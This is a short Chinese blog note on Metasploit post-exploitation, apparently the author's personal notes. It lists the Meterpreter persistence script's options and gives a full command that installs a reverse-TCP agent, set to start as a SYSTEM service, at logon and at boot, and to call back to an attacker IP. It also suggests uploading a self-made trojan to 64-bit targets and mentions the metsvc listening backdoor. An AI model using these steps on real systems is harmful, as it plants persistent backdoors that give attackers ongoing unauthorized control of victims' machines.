首页 友人帐 关于我

msf木马实用操作

2021-08-02

后渗透阶段的简单笔记….TBC

各种模块:

使用方法:meterpreter > run [模块名称]

维持脚本之persistence

1
2
3
4
5
6
7
8
9
10
11
12
13
meterpreter > run persistence -h
OPTIONS:
-A #自动启动一个匹配的exploit / multi / handler来连接到代理
-L #如果未使用%TEMP%,则在目标主机中写入有效负载的位置。
-P #有效负载使用,默认为windows / meterpreter / reverse_tcp。
-S #作为服务自动启动代理程序(具有SYSTEM权限)
-T #要使用的备用可执行模板
-U #用户登录时自动启动代理
-X #系统引导时自动启动代理程序
-h #这个帮助菜单
-i #每次连接尝试之间的时间间隔(秒)
-p #运行Metasploit的系统正在侦听的端口
-r #运行Metasploit监听连接的系统的IP

例子:
run persistence -S -U -X -i 5 -p 6666 -r 192.168.190.141
注意,这个脚本生成的木马 貌似/好像/大概/也许 是一个16位的程序…最高也只能在32位系统里运行,
对于64位系统,可以自行再生成一个msf木马upload到靶机上去,一般情况下,其木马所在位置会在执行这个脚本时输出

权限维持俩脚本之metsvc

emmm,我不是很推荐用这个,这个脚本不是反向连接的,会在目标机上监听一个端口,随便一个谁去连接都是直接拿到权限,包括各种安全扫描工具…..





知识共享许可协议
本作品采用知识共享署名 4.0 国际许可协议进行许可。